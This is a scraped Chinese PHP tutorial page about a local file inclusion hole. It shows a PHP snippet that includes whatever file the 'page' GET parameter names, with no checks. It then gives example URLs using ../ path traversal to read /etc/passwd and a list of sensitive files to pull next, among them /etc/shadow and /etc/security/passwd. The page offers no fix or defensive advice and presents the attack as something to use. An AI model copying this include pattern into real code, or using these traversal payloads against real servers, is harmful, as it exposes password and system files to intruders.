简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)
首页 > 后端开发 > php教程 > 正文

php 伪造本地文件包含漏洞的代码_PHP教程

WBOY
发布: 2016-07-21 15:23:40
原创
1000 人浏览过

代码:

复制代码 代码如下:

$page=$_GET['page'];
include($page.'php');
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/324439.htmlTechArticle代码: 复制代码 代码如下: ?php $page=$_GET['page']; include($page.'php'); ? 你可以这样使用 http://www.xxx.com/index.php?page=../etc/passwd http://www.xxx.com/index.p...
相关标签:
get include page php 代码 伪造 包含 复制 文件 本地 漏洞
来源:php.cn
上一篇:PHP+MYSQL会员系统的登陆即权限判断实现代码_PHP教程 下一篇:php数组函数序列之ksort()对数组的元素键名进行升序排序,保持索引关系_PHP教程
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
作者最新文章
最新问题
如何在 PHP 中使用 while 循环按 ID 列出节中的数据? 我有一个包含这些列的mysql表:series_id,series_color,product_name在输出中,我想按部分列出数据,每个series_id一个部分,如下所示:A1...
来自于 2023-11-17 20:03:03
0
1
290
未定义函数create_function()的调用 我在网站首页收到此消息:致命错误:未捕获错误:调用/customers/7/e/7/jovobytes.be/httpd.www/wp-content/themes/inovado...
来自于 2023-11-16 19:00:36
0
1
277
<?php //给定一个年月日,输出该日期是当年的第几天(注意闰年4 100 400) <?php //给定一个年月日,输出该日期是当年的第几天(注意闰年4 100 400) //可使用的技术路线:各类变量 例如数组 流程控制语句switch if el...
来自于 2023-11-14 23:55:21
0
1
79
PHP 修剪 unicode 空格 我正在尝试修剪诸如此字符之类的unicode空格,并且我能够使用此解决方案来做到这一点。此解决方案的问题是它不会修剪普通字符之间的unicode空格。例如这个使用薄空间$strin...
来自于 2023-11-13 08:49:45
0
2
398
TYPO3 V11: "PHP警告:未定义的数组键",$this->request->getArguments()为空 我是typo3的新用户,我制作了一个插件来显示用户,并使用搜索栏来过滤他们,但是当我想显示我的页面时出现此错误:(1/1)#1476107295TYPO3\CMS\Core\Err...
来自于 2023-11-12 21:35:09
0
1
362
相关专题
更多>
热门推荐
热门教程
更多>
相关教程
热门推荐
最新课程
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责声明 Sitemap
PHP中文网:公益在线PHP培训,帮助PHP学习者快速成长!